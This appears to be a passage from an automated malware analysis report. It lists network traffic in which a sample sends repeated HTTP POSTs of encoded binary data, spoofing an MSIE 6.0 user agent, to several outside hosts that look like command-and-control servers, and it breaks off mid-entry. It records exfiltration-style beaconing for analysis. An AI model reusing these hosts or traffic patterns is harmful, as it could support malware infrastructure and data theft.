hLEjhtQUdGPodhodr3pUkicbzkBMNqEZSM+4Cszso8QXYud4xxmhsPozcyhBe+K+QdUVGljC05oZLq9rjTpm2GkX53R0LYECBf0OivGvuZ0crAV8kx/kjVUbyrKaZ2wjgVDQE6eGU6gMC+0b1dwHfIy48dv9OXUApy/Nk8x4WRMYidUUIrqH7/+TNPQTsXpFnades6/SQkBZCoaSZLGi/m1tnxMbKI3V1u0CHldnYAAzhNwHrPjQeA3qZWLVWeKXQ2VbDlzopiqY3XwSsUa91Qq6GEARQK6sgCWm7vG3TSInP12SDn6JAQZ6RHbOnk8Dja6OXlrayd5LFtDuhEqwkz1R0r974WDgUJWXe7pumsGKwEuXUGhIMZmWZkeGNlujTllcIAgoNmKwPusaSRifcYOZBHdkb/JQAP3ouNNEVpUlbh6itpK1NrbxX5IIU8Bya+9dUwhT54NBWnhd8Ax3D3w7Qcwqe42ezNh8YuFhsC26nExYWGJvmJcaDZm5qG9VQMoCqy8Tymv0OWclKIRCjSUofn6xFHzuvqtW1O8APd4WIOCRhHrW6jqfQdGs3Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 6e 74 79 7a 68 4f 45 49 64 47 50 2b 31 30 78 49 51 41 7a 57 59 72 72 6a 55 73 72 66 67 39 65 54 70 63 55 4f 7a 2b 2f 48 76 44 5a 2f 51 38 6c 59 63 56 5a 48 79 4c 32 44 35 55 49 58 7a 6a 69 4e 63 42 49 67 39 57 67 67 53 63 58 4a 47 51 6a 6f 71 68 64 54 39 6e 31 4a 58 78 37 58 4a 36 4a 54 75 68 32 79 49 42 39 79 4a 75 6f 38 44 38 58 6f 45 76 48 2b 72 5a 74 38 6d 55 71 32 59 48 6e 6f 79 48 4a 33 30 53 45 35 4d 4f 68 67 72 38 4b 37 66 42 57 55 43 62 68 48 76 30 69 52 47 46 66 5a 4f 31 70 33 57 46 2f 41 32 78 31 33 6e 72 41 67 61 65 30 6c 34 66 52 6d 64 4e 31 57 5a 6f 4c 31 54 39 54 42 6a 54 6a 65 5a 34 4d 67 68 43 63 38 6f 6e 74 42 56 78 35 6f 78 4b 6f 75 30 33 2f 66 71 53 61 72 6b 45 6b 32 65 4c 64 42 55 4d 72 2f 61 74 44 75 38 58 64 76 54 74 67 5a 48 43 35 6f 57 34 4a 73 49 2b 53 6a 4f 5a 34 79 2f 68 36 72 36 6c 2b 66 31 45 2b 33 32 38 59 75 71 66 4b 59 74 31 63 51 4a 76 6c 35 6f 30 36 31 6e 44 6f 48 69 5a 53 30 2f 33 37 72 75 39 66 6f 48 53 48 36 63 6f 6f 34 46 4c 56 66 5a 57 51 46 64 47 39 36 77 38 75 44 44 46 77 48 75 7a 4f 69 4a 53 47 5a 55 72 52 6a 5a 75 72 65 55 58 42 76 62 32 4f 70 45 6f 74 56 59 76 35 65 4e 6b 32 33 59 4d 6d 51 70 74 66 6e 6b 31 78 4d 74 51 59 4f 4f 78 35 68 4b 58 55 42 6d 77 4a 34 7a 41 6a 75 7a 4c 58 58 6e 44 78 52 31 36 38 51 36 44 58 2b 32 2f 56 54 66 34 79 67 58 33 34 53 42 65 6e 42 75 78 71 43 70 63 49 37 49 58 5a 6b 51 31 2b 50 78 64 62 68 45 6f 55 4b 71 4c 46 42 66 62 54 4d 61 37 46 50 38 30 51 6c 36 35 6a 77 58 59 63 6e 50 47 68 43 65 68 48 72 46 6e 54 67 51 4d 52 2f 30 50 38 4c 35 35 61 64 48 69 39 49 2b 59 4b 79 53 53 70 65 50 4b 42 48 4f 2f 34 75 4d 67 49 76 4d 6c 53 34 32 72 72 51 7a 48 76 53 65 76 64 30 68 66 4e 41 4c 50 49 53 38 79 66 6e 56 47 30 52 42 6f 48 68 6a 65 45 37 Data Ascii: ntyzhOEIdGP+10xIQAzWYrrjUsrfg9eTpcUOz+/HvDZ/Q8lYcVZHyL2D5UIXzjiNcBIg9WggScXJGQjoqhdT9n1JXx7XJ6JTuh2yIB9yJuo8D8XoEvH+rZt8mUq2YHnoyHJ30SE5MOhgr8K7fBWUCbhHv0iRGFfZO1p3WF/A2x13nrAgae0l4fRmdN1WZoL1T9TBjTjeZ4MghCc8ontBVx5oxKou03/fqSarkEk2eLdBUMr/atDu8XdvTtgZHC5oW4JsI+SjOZ4y/h6r6l+f1E+328YuqfKYt1cQJvl5o061nDoHiZS0/37ru9foHSH6coo4FLVfZWQFdG96w8uDDFwHuzOiJSGZUrRjZureUXBvb2OpEotVYv5eNk23YMmQptfnk1xMtQYOOx5hKXUBmwJ4zAjuzLXXnDxR168Q6DX+2/VTf4ygX34SBenBuxqCpcI7IXZkQ1+PxdbhEoUKqLFBfbTMa7FP80Ql65jwXYcnPGhCehHrFnTgQMR/0P8L55adHi9I+YKySSpePKBHO/4uMgIvMlS42rrQzHvSevd0hfNALPIS8yfnVG0RBoHhjeE7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 37 38 71 6b 68 62 4d 51 64 47 50 37 58 42 6b 39 2b 68 35 32 4b 56 79 42 46 32 45 5a 78 51 78 64 6c 2b 6c 6a 36 6c 32 66 6c 2b 76 34 57 52 55 6d 34 67 68 42 55 4a 38 71 53 4a 37 6b 36 4d 6d 39 61 6d 31 43 43 51 79 70 46 70 2f 42 62 55 53 69 77 67 55 6a 78 64 52 4c 68 4a 54 51 6b 2f 79 51 6b 45 48 79 4d 46 78 39 55 39 4e 5a 49 74 45 37 4d 77 6c 79 44 50 55 57 71 7a 68 6a 7a 36 4f 61 32 68 59 4b 64 68 7a 53 6e 50 34 38 38 71 53 4b 44 75 62 35 6b 78 6a 73 39 76 62 31 66 59 65 75 41 4f 2b 61 66 36 33 43 70 69 69 49 6c 62 65 47 49 42 4a 65 57 52 53 63 31 48 46 78 45 74 44 46 62 6f 63 48 66 69 35 43 76 79 74 41 65 49 51 35 53 50 59 74 6e 64 73 4a 55 64 6c 6a 65 78 39 55 74 38 6c 6d 39 5a 4f 5a 53 6c 78 4d 35 4f 61 4c 78 66 49 6a 7a 58 4b 56 4c 68 79 78 59 6c 6c 38 35 70 2f 4f 32 47 4f 4d 73 55 71 72 2f 6d 68 69 44 78 4d 6a 45 31 71 51 69 5a 67 79 6f 46 44 6e 77 4c 7a 4a 4e 65 46 4f 66 37 42 6a 35 4d 4d 4d 4f 36 45 6e 78 6a 69 6e 46 53 77 70 70 69 39 7a 36 41 5a 4f 73 69 32 68 59 6c 77 45 51 73 62 6d 35 4a 45 6f 2b 55 4b 66 55 43 78 4c 74 32 75 68 79 61 73 47 57 64 72 72 69 4a 35 47 30 35 4d 62 47 47 30 77 6b 46 6f 65 61 56 66 37 5a 6b 56 35 73 35 34 6c 47 57 33 45 78 63 74 47 50 6c 41 59 52 77 34 5a 41 72 4c 57 5a 54 33 6c 33 68 42 4e 7a 58 62 75 48 69 66 75 4f 30 4d 2b 61 58 70 50 2f 31 47 49 56 33 7a 76 2b 6f 4a 52 51 68 30 6f 55 33 42 70 59 77 43 42 79 30 65 71 38 4b 41 4c 36 6b 67 38 6a 79 6b 41 6a 43 2f 30 76 62 4d 45 36 77 57 34 79 36 75 36 46 54 64 6f 46 64 4c 42 35 43 43 4d 38 34 6f 6d 37 65 59 71 4a 6e 68 4d 4d 6a 4f 51 62 53 77 45 44 6d 63 65 35 59 57 61 6f 49 31 69 46 6a 65 54 2f 73 79 72 53 4b 39 45 57 4a 74 70 63 35 6f 5a 49 4d 6a 37 69 41 3d 3d Data Ascii: 78qkhbMQdGP7XBk9+h52KVyBF2EZxQxdl+lj6l2fl+v4WRUm4ghBUJ8qSJ7k6Mm9am1CCQypFp/BbUSiwgUjxdRLhJTQk/yQkEHyMFx9U9NZItE7MwlyDPUWqzhjz6Oa2hYKdhzSnP488qSKDub5kxjs9vb1fYeuAO+af63CpiiIlbeGIBJeWRSc1HFxEtDFbocHfi5CvytAeIQ5SPYtndsJUdljex9Ut8lm9ZOZSlxM5OaLxfIjzXKVLhyxYll85p/O2GOMsUqr/mhiDxMjE1qQiZgyoFDnwLzJNeFOf7Bj5MMMO6EnxjinFSwppi9z6AZOsi2hYlwEQsbm5JEo+UKfUCxLt2uhyasGWdrriJ5G05MbGG0wkFoeaVf7ZkV5s54lGW3ExctGPlAYRw4ZArLWZT3l3hBNzXbuHifuO0M+aXpP/1GIV3zv+oJRQh0oU3BpYwCBy0eq8KAL6kg8jykAjC/0vbME6wW4y6u6FTdoFdLB5CCM84om7eYqJnhMMjOQbSwEDmce5YWaoI1iFjeT/syrSK9EWJtpc5oZIMj7iA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 77 30 4c 49 30 53 30 71 68 32 4e 61 57 6f 5a 65 4a 41 56 2f 51 2b 59 75 69 39 4d 62 4c 66 50 51 73 58 58 62 68 51 35 41 33 45 7a 74 32 56 33 70 57 54 33 64 32 6c 51 6b 2b 31 6d 78 33 56 67 53 4d 7a 4d 64 43 58 46 6a 2f 76 68 73 31 41 31 4e 6b 37 61 44 35 63 6c 54 6b 47 2f 55 44 6a 6d 55 46 55 47 39 70 70 63 6e 2b 79 77 53 31 6f 41 68 4c 64 64 57 6e 76 70 78 7a 72 39 44 61 2f 43 74 2f 6d 37 61 67 2f 57 41 77 31 57 47 6c 4c 6d 36 75 65 6e 6f 47 2f 65 76 32 75 59 36 4f 6d 65 56 56 39 63 4b 44 37 48 42 6e 6a 67 51 6b 7a 51 4d 31 62 6d 71 4c 79 30 6f 67 38 32 63 4d 38 34 63 65 42 6e 34 69 71 46 30 68 6c 75 38 77 6f 6d 52 2f 32 73 6f 6c 31 6e 65 70 6b 39 6e 4d 31 75 33 66 55 55 54 4a 6f 39 59 6e 58 76 75 35 73 67 37 4b 33 45 56 59 67 39 54 76 51 68 4b 47 58 76 42 6d 6d 38 58 70 39 73 30 45 4e 37 63 4d 58 53 43 33 70 46 4f 39 2f 46 37 65 59 43 57 2f 42 54 6b 79 33 61 61 78 45 57 2b 51 2b 67 65 5a 59 47 67 52 34 4e 6a 65 58 59 4a 51 41 37 35 5a 4d 35 73 70 37 43 49 6d 49 64 47 54 47 52 55 30 52 6a 78 57 59 7a 79 47 7a 49 6d 6a 6c 4b 66 4e 42 63 78 64 69 43 42 37 67 36 61 4d 49 6b 78 42 68 61 58 5a 37 56 66 46 6c 4b 76 75 6b 38 7a 54 4e 37 51 79 77 59 6c 33 6d 55 39 78 51 53 47 35 53 37 43 74 35 4b 49 50 4f 47 6b 6f 75 55 31 7a 6c 4e 4e 6e 57 51 57 65 68 44 49 36 35 49 37 6a 35 6b 52 41 56 66 68 31 4c 53 6a 6e 61 56 6c 6c 6f 58 36 42 4b 56 61 71 2f 6c 42 55 58 57 74 4a 32 78 37 34 64 54 30 53 44 36 32 55 58 6e 68 2b 30 73 46 50 2b 42 6c 41 34 35 62 73 5a 6a 51 6d 65 48 59 6b 6c 4c 30 59 38 4d 45 38 68 48 36 69 42 62 6e 69 69 6d 4f 4c 57 45 5a 44 65 33 4c 4e 62 79 32 33 46 4d 41 65 69 45 47 Data Ascii: w0LI0S0qh2NaWoZeJAV/Q+Yui9MbLfPQsXXbhQ5A3Ezt2V3pWT3d2lQk+1mx3VgSMzMdCXFj/vhs1A1Nk7aD5clTkG/UDjmUFUG9ppcn+ywS1oAhLddWnvpxzr9Da/Ct/m7ag/WAw1WGlLm6uenoG/ev2uY6OmeVV9cKD7HBnjgQkzQM1bmqLy0og82cM84ceBn4iqF0hlu8womR/2sol1nepk9nM1u3fUUTJo9YnXvu5sg7K3EVYg9TvQhKGXvBmm8Xp9s0EN7cMXSC3pFO9/F7eYCW/BTky3aaxEW+Q+geZYGgR4NjeXYJQA75ZM5sp7CImIdGTGRU0RjxWYzyGzImjlKfNBcxdiCB7g6aMIkxBhaXZ7VfFlKvuk8zTN7QywYl3mU9xQSG5S7Ct5KIPOGkouU1zlNNnWQWehDI65I7j5kRAVfh1LSjnaVlloX6BKVaq/lBUXWtJ2x74dT0SD62UXnh+0sFP+BlA45bsZjQmeHYklL0Y8ME8hH6iBbniimOLWEZDe3LNby23FMAeiEG
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 66 49 55 44 7a 44 62 36 68 6d 4d 66 35 4a 4e 57 6b 53 78 42 67 64 6d 38 4a 68 4e 57 33 49 68 49 79 6d 47 35 2f 36 67 34 63 58 6d 51 4b 51 56 53 30 47 42 52 65 62 32 31 33 57 5a 57 31 6c 57 4c 64 6b 6f 42 42 35 30 7a 53 6f 7a 72 41 62 2f 74 58 62 6e 79 71 56 50 54 57 42 68 52 56 35 5a 48 59 6c 31 5a 6d 46 71 64 6b 76 4f 2b 74 7a 61 43 4a 32 57 74 4c 73 65 31 57 4f 52 50 51 36 55 32 68 6e 6f 6d 6d 6f 45 4d 77 47 71 2b 38 68 50 6c 74 4a 41 52 35 50 32 53 71 56 52 32 4c 79 62 4f 6d 42 53 50 2f 38 46 61 4b 66 6f 68 79 48 74 50 55 44 70 43 56 64 2f 6b 66 45 72 4b 33 38 32 59 6f 51 79 77 4b 4c 70 4e 6c 32 70 6a 76 6f 76 6b 34 53 6c 4b 35 71 6d 66 63 70 6f 39 35 70 69 65 6e 73 6a 4f 70 50 67 4b 38 52 63 61 48 41 58 49 57 70 72 61 7a 4a 63 41 2f 4f 53 72 48 65 44 71 75 6f 67 42 46 52 38 50 73 71 36 2b 64 55 7a 52 78 6e 72 49 78 72 70 30 62 72 54 44 61 73 6e 30 50 35 4b 63 4d 49 6f 31 6e 32 36 7a 6a 65 35 6a 68 4b 74 56 37 49 67 52 56 34 37 39 6c 4e 38 35 2b 70 68 4e 43 31 4b 78 6b 6c 51 79 48 38 42 55 2b 74 62 67 74 55 31 46 65 4a 47 49 4f 41 2b 31 6f 6b 39 6c 74 6d 72 4c 5a 39 41 69 68 79 30 37 43 48 47 2f 44 48 52 63 58 45 69 61 32 32 61 4b 6e 42 6d 76 6d 75 54 44 41 50 32 57 5a 66 4a 63 46 4a 67 64 65 73 62 44 47 4e 6d 49 72 6f 5a 4f 6e 4f 4b 78 47 4a 51 6f 46 57 56 65 64 42 79 72 49 6f 38 48 4a 70 63 68 71 39 74 30 52 72 6f 62 54 55 6a 63 41 50 50 59 4d 47 61 55 6a 75 45 50 6a 4e 32 4c 63 37 41 46 68 39 50 4d 43 61 58 4c 53 71 59 6e 53 51 45 67 5a 45 53 2b 6f 6c 70 7a 55 61 5a 46 4e 53 51 52 71 66 6f 7a 42 78 70 75 4d 6b 4e 45 44 78 59 73 50 6b 73 30 52 42 67 36 79 54 39 30 6d 43 68 41 68 64 61 53 39 6d 4b 59 67 42 4e 55 37 51 43 64 54 39 4d 4a 6a 70 65 42 2b 4d 48 38 61 4d 52 66 37 72 35 41 65 76 48 2f 44 55 41 76 37 37 4a 44 61 73 35 58 75 2b 51 51 45 7a 64 54 69 41 3d 3d Data Ascii: fIUDzDb6hmMf5JNWkSxBgdm8JhNW3IhIymG5/6g4cXmQKQVS0GBReb213WZW1lWLdkoBB50zSozrAb/tXbnyqVPTWBhRV5ZHYl1ZmFqdkvO+tzaCJ2WtLse1WORPQ6U2hnommoEMwGq+8hPltJAR5P2SqVR2LybOmBSP/8FaKfohyHtPUDpCVd/kfErK382YoQywKLpNl2pjvovk4SlK5qmfcpo95piensjOpPgK8RcaHAXIWprazJcA/OSrHeDquogBFR8Psq6+dUzRxnrIxrp0brTDasn0P5KcMIo1n26zje5jhKtV7IgRV479lN85+phNC1KxklQyH8BU+tbgtU1FeJGIOA+1ok9ltmrLZ9Aihy07CHG/DHRcXEia22aKnBmvmuTDAP2WZfJcFJgdesbDGNmIroZOnOKxGJQoFWVedByrIo8HJpchq9t0RrobTUjcAPPYMGaUjuEPjN2Lc7AFh9PMCaXLSqYnSQEgZES+olpzUaZFNSQRqfozBxpuMkNEDxYsPks0RBg6yT90mChAhdaS9mKYgBNU7QCdT9MJjpeB+MH8aMRf7r5AevH/DUAv77JDas5Xu+QQEzdTiA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 77 45 43 68 54 62 77 76 69 32 4f 79 36 49 36 6d 5a 30 66 68 61 45 38 2b 65 6c 68 55 66 30 6c 53 73 4b 53 2b 30 43 6e 46 44 7a 42 48 73 67 77 41 45 6f 35 70 53 4b 42 62 75 38 39 5a 68 39 67 46 78 67 6a 49 65 46 66 48 33 42 35 7a 31 72 5a 61 6b 38 61 66 4c 6a 51 76 55 36 30 65 5a 6f 77 2b 4a 2b 75 48 73 49 68 32 56 66 44 35 6a 2f 7a 72 58 68 75 70 67 46 45 66 54 57 45 6f 72 31 43 68 42 49 30 67 61 59 53 4f 46 67 6d 6d 62 55 52 34 76 6d 2f 77 61 30 75 64 33 62 4e 41 4b 63 4b 6a 53 65 41 66 63 51 41 49 55 61 2f 32 2b 50 6a 43 72 4a 48 67 78 71 63 77 77 58 54 6f 50 53 44 6b 2f 79 35 70 72 67 4b 31 45 42 66 46 33 77 45 35 65 52 69 6f 2f 6e 48 70 31 41 4a 54 48 6a 51 52 31 6f 4b 2b 73 35 62 68 71 4a 2b 67 49 4b 36 76 71 76 57 78 62 4e 71 74 68 34 39 55 30 41 54 57 2b 78 73 57 58 74 35 68 36 53 6b 56 70 41 63 46 64 4e 39 67 37 67 33 70 59 43 37 67 55 6d 47 64 32 66 39 68 53 6f 79 73 4e 68 4b 33 72 71 69 77 53 31 56 34 52 4d 73 62 4a 2f 71 4a 4d 70 44 4d 48 70 50 4d 49 64 46 48 2b 6d 6f 48 65 55 45 6f 6d 53 58 6b 58 77 78 78 78 36 67 37 57 68 63 70 41 53 57 31 50 54 35 71 56 36 32 63 4e 4c 45 46 70 33 45 4e 43 4d 49 73 6a 57 4d 4f 68 66 4d 47 7a 58 43 62 78 30 66 53 50 53 64 2b 32 49 75 5a 74 73 6f 41 6c 62 34 51 75 68 74 52 36 30 68 6c 66 6d 4f 50 4b 73 31 7a 45 77 4f 58 2b 4c 6b 76 51 56 34 2f 4f 37 2b 30 4e 6d 2f 61 42 55 6f 37 72 54 45 62 56 62 54 4b 56 42 6d 49 33 78 6b 77 72 67 38 54 48 44 66 74 64 45 6b 36 72 4a 33 6c 53 75 6d 35 46 74 4d 46 74 67 78 2b 6a 70 73 48 4b 69 68 38 55 72 38 4d 79 79 70 57 31 31 61 4d 62 68 32 6c 61 7a 77 4c 39 4e 71 55 50 4d 42 44 37 75 73 53 61 7a 72 76 42 31 6a 44 56 6a 4e 4a 4f 4a 4f 64 4b 4b 7a 65 46 30 65 38 70 4e 47 59 53 39 6a 36 47 54 36 45 66 4a 75 52 46 6a 42 2b 46 54 38 63 48 55 4e 66 54 6d 48 68 58 48 42 64 70 73 32 42 59 57 4a 6d Data Ascii: wEChTbwvi2Oy6I6mZ0fhaE8+elhUf0lSsKS+0CnFDzBHsgwAEo5pSKBbu89Zh9gFxgjIeFfH3B5z1rZak8afLjQvU60eZow+J+uHsIh2VfD5j/zrXhupgFEfTWEor1ChBI0gaYSOFgmmbUR4vm/wa0ud3bNAKcKjSeAfcQAIUa/2+PjCrJHgxqcwwXToPSDk/y5prgK1EBfF3wE5eRio/nHp1AJTHjQR1oK+s5bhqJ+gIK6vqvWxbNqth49U0ATW+xsWXt5h6SkVpAcFdN9g7g3pYC7gUmGd2f9hSoysNhK3rqiwS1V4RMsbJ/qJMpDMHpPMIdFH+moHeUEomSXkXwxxx6g7WhcpASW1PT5qV62cNLEFp3ENCMIsjWMOhfMGzXCbx0fSPSd+2IuZtsoAlb4QuhtR60hlfmOPKs1zEwOX+LkvQV4/O7+0Nm/aBUo7rTEbVbTKVBmI3xkwrg8THDftdEk6rJ3lSum5FtMFtgx+jpsHKih8Ur8MyypW11aMbh2lazwL9NqUPMBD7usSazrvB1jDVjNJOJOdKKzeF0e8pNGYS9j6GT6EfJuRFjB+FT8cHUNfTmHhXHBdps2BYWJm
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheCookie: rfqtk_wp_session_e2ba905bf306f46faca223d3cb20e2cf=fd4df5563fe966f0c8d2373da96368aa%7C%7C%7C%7CData Raw: 69 77 5a 55 79 38 4e 45 6a 32 4e 4e 6e 5a 76 58 79 69 4d 6d 46 2b 79 6a 51 67 31 70 38 6e 70 46 70 35 35 57 73 5a 74 64 4b 54 34 58 6f 6d 32 30 4e 79 43 6b 43 5a 37 32 73 46 43 6a 4f 6d 59 42 30 56 48 75 56 4d 57 4b 56 43 64 70 30 31 72 66 66 69 69 7a 63 47 33 32 6f 53 30 50 79 49 46 63 62 51 35 4c 77 79 2f 6d 4e 58 4e 37 4e 70 62 2b 45 69 36 7a 73 32 2f 71 5a 6b 30 72 57 57 39 7a 39 4a 48 6b 6d 65 55 5a 6e 70 74 4d 32 45 49 71 4d 53 4a 76 4b 41 4d 69 4c 45 52 30 49 33 6b 70 74 71 4d 47 51 68 4b 4e 6f 35 57 59 77 41 58 32 69 4d 76 69 6b 5a 36 38 4f 37 33 41 32 44 58 4e 54 7a 77 4c 4d 65 39 6c 51 64 6c 43 4f 6f 2b 73 69 47 44 72 6e 38 44 59 46 35 46 56 48 53 54 61 5a 32 5a 6a 43 73 50 4f 42 35 74 35 36 37 4e 42 53 4e 66 70 66 56 55 68 59 32 35 76 61 57 63 43 4c 6d 42 48 45 6e 4c 6b 33 4b 75 42 75 68 6f 62 72 51 31 71 4d 49 48 63 44 51 48 63 65 4a 63 4f 70 53 53 46 37 4c 31 55 71 54 65 6b 76 35 33 43 31 66 74 34 42 59 4f 76 6d 56 64 61 76 57 34 34 35 4e 6c 50 42 6c 45 51 51 34 4b 73 45 55 50 70 44 6e 51 4a 6e 48 30 69 46 4a 4f 55 51 46 4c 4d 74 48 72 59 2f 70 48 7a 57 53 5a 74 78 6d 55 56 32 53 47 78 4f 6e 46 72 66 75 72 67 55 53 7a 59 35 38 76 35 55 6d 39 70 6d 43 73 42 70 61 39 56 79 4d 42 39 73 61 67 2f 76 73 35 75 59 62 66 52 77 69 71 6f 50 50 34 71 51 4c 77 65 61 44 5a 6c 75 71 55 71 36 32 4f 31 6d 78 65 37 30 63 78 4a 49 56 37 79 7a 74 45 79 66 71 32 4f 62 78 79 54 41 2b 2f 50 6f 6b 79 47 79 6d 34 56 4d 36 66 38 6b 33 65 38 71 55 36 53 4a 47 44 50 32 6a 6b 6f 4d 64 42 42 62 53 67 42 61 69 62 73 43 6e 4d 70 57 6f 6f 46 50 2b 73 62 4c 4f 2f 6d 57 68 34 4b 64 65 45 70 62 4d 69 53 45 31 45 70 6a 6b 46 73 67 59 49 51 4b 4c 73 4c 43 59 6f 38 67 5a 76 51 71 41 3d 3d Data Ascii: iwZUy8NEj2NNnZvXyiMmF+yjQg1p8npFp55WsZtdKT4Xom20NyCkCZ72sFCjOmYB0VHuVMWKVCdp01rffiizcG32oS0PyIFcbQ5Lwy/mNXN7Npb+Ei6zs2/qZk0rWW9z9JHkmeUZnptM2EIqMSJvKAMiLER0I3kptqMGQhKNo5WYwAX2iMvikZ68O73A2DXNTzwLMe9lQdlCOo+siGDrn8DYF5FVHSTaZ2ZjCsPOB5t567NBSNfpfVUhY25vaWcCLmBHEnLk3KuBuhobrQ1qMIHcDQHceJcOpSSF7L1UqTekv53C1ft4BYOvmVdavW445NlPBlEQQ4KsEUPpDnQJnH0iFJOUQFLMtHrY/pHzWSZtxmUV2SGxOnFrfurgUSzY58v5Um9pmCsBpa9VyMB9sag/vs5uYbfRwiqoPP4qQLweaDZluqUq62O1mxe70cxJIV7yztEyfq2ObxyTA+/PokyGym4VM6f8k3e8qU6SJGDP2jkoMdBBbSgBaibsCnMpWooFP+sbLO/mWh4KdeEpbMiSE1EpjkFsgYIQKLsLCYo8gZvQqA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 66 49 55 44 7a 44 62 36 68 6d 4d 66 35 4a 4e 57 6b 53 78 42 67 64 6d 38 4a 68 4e 57 33 49 68 49 79 6d 47 35 2f 36 67 34 63 58 6d 51 4b 51 56 53 30 47 42 52 65 62 32 31 33 57 5a 57 31 6c 57 4c 64 6b 6f 42 42 35 30 7a 53 6f 7a 72 41 62 2f 74 58 62 6e 79 71 56 50 54 57 42 68 52 56 35 5a 48 59 6c 31 5a 6d 46 71 64 6b 76 4f 2b 74 7a 61 43 4a 32 57 74 4c 73 65 31 57 4f 52 50 51 36 55 32 68 6e 6f 6d 6d 6f 45 4d 77 47 71 2b 38 68 50 6c 74 4a 41 52 35 50 32 53 71 56 52 32 4c 79 62 4f 6d 42 53 50 2f 38 46 61 4b 66 6f 68 79 48 74 50 55 44 70 43 56 64 2f 6b 66 45 72 4b 33 38 32 59 6f 51 79 77 4b 4c 70 4e 6c 32 70 6a 76 6f 76 6b 34 53 6c 4b 35 71 6d 66 63 70 6f 39 35 70 69 65 6e 73 6a 4f 70 50 67 4b 38 52 63 61 48 41 58 49 57 70 72 61 7a 4a 63 41 2f 4f 53 72 48 65 44 71 75 6f 67 42 46 52 38 50 73 71 36 2b 64 55 7a 52 78 6e 72 49 78 72 70 30 62 72 54 44 61 73 6e 30 50 35 4b 63 4d 49 6f 31 6e 32 36 7a 6a 65 35 6a 68 4b 74 56 37 49 67 52 56 34 37 39 6c 4e 38 35 2b 70 68 4e 43 31 4b 78 6b 6c 51 79 48 38 42 55 2b 74 62 67 74 55 31 46 65 4a 47 49 4f 41 2b 31 6f 6b 39 6c 74 6d 72 4c 5a 39 41 69 68 79 30 37 43 48 47 2f 44 48 52 63 58 45 69 61 32 32 61 4b 6e 42 6d 76 6d 75 54 44 41 50 32 57 5a 66 4a 63 46 4a 67 64 65 73 62 44 47 4e 6d 49 72 6f 5a 4f 6e 4f 4b 78 47 4a 51 6f 46 57 56 65 64 42 79 72 49 6f 38 48 4a 70 63 68 71 39 74 30 52 72 6f 62 54 55 6a 63 41 50 50 59 4d 47 61 55 6a 75 45 50 6a 4e 32 4c 63 37 41 46 68 39 50 4d 43 61 58 4c 53 71 59 6e 53 51 45 67 5a 45 53 2b 6f 6c 70 7a 55 61 5a 46 4e 53 51 52 71 66 6f 7a 42 78 70 75 4d 6b 4e 45 44 78 59 73 50 6b 73 30 52 42 67 36 79 54 39 30 6d 43 68 41 68 64 61 53 39 6d 4b 59 67 42 4e 55 37 51 43 64 54 39 4d 4a 6a 70 65 42 2b 4d 48 38 61 4d 52 66 37 72 35 41 65 76 48 2f 44 55 41 76 37 37 4a 44 61 73 35 58 75 2b 51 51 45 7a 64 54 69 41 3d 3d Data Ascii: fIUDzDb6hmMf5JNWkSxBgdm8JhNW3IhIymG5/6g4cXmQKQVS0GBReb213WZW1lWLdkoBB50zSozrAb/tXbnyqVPTWBhRV5ZHYl1ZmFqdkvO+tzaCJ2WtLse1WORPQ6U2hnommoEMwGq+8hPltJAR5P2SqVR2LybOmBSP/8FaKfohyHtPUDpCVd/kfErK382YoQywKLpNl2pjvovk4SlK5qmfcpo95piensjOpPgK8RcaHAXIWprazJcA/OSrHeDquogBFR8Psq6+dUzRxnrIxrp0brTDasn0P5KcMIo1n26zje5jhKtV7IgRV479lN85+phNC1KxklQyH8BU+tbgtU1FeJGIOA+1ok9ltmrLZ9Aihy07CHG/DHRcXEia22aKnBmvmuTDAP2WZfJcFJgdesbDGNmIroZOnOKxGJQoFWVedByrIo8HJpchq9t0RrobTUjcAPPYMGaUjuEPjN2Lc7AFh9PMCaXLSqYnSQEgZES+olpzUaZFNSQRqfozBxpuMkNEDxYsPks0RBg6yT90mChAhdaS9mKYgBNU7QCdT9MJjpeB+MH8aMRf7r5AevH/DUAv77JDas5Xu+QQEzdTiA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 47 63 36 6c 4a 69 4f 4d 6d 6d 4f 4f 2f 72 48 68 71 67 4f 4a 6a 6b 78 43 57 31 39 4a 6a 54 53 33 42 2b 79 42 41 62 69 62 76 58 34 4b 63 72 35 4d 36 74 49 6e 41 65 78 69 78 35 7a 31 44 31 6d 39 71 69 6c 6f 72 6c 75 4e 78 49 70 45 5a 46 30 57 64 67 6e 62 75 58 52 53 2f 6a 55 43 62 41 34 6d 74 6d 4e 6a 6a 65 56 51 59 4d 4b 76 36 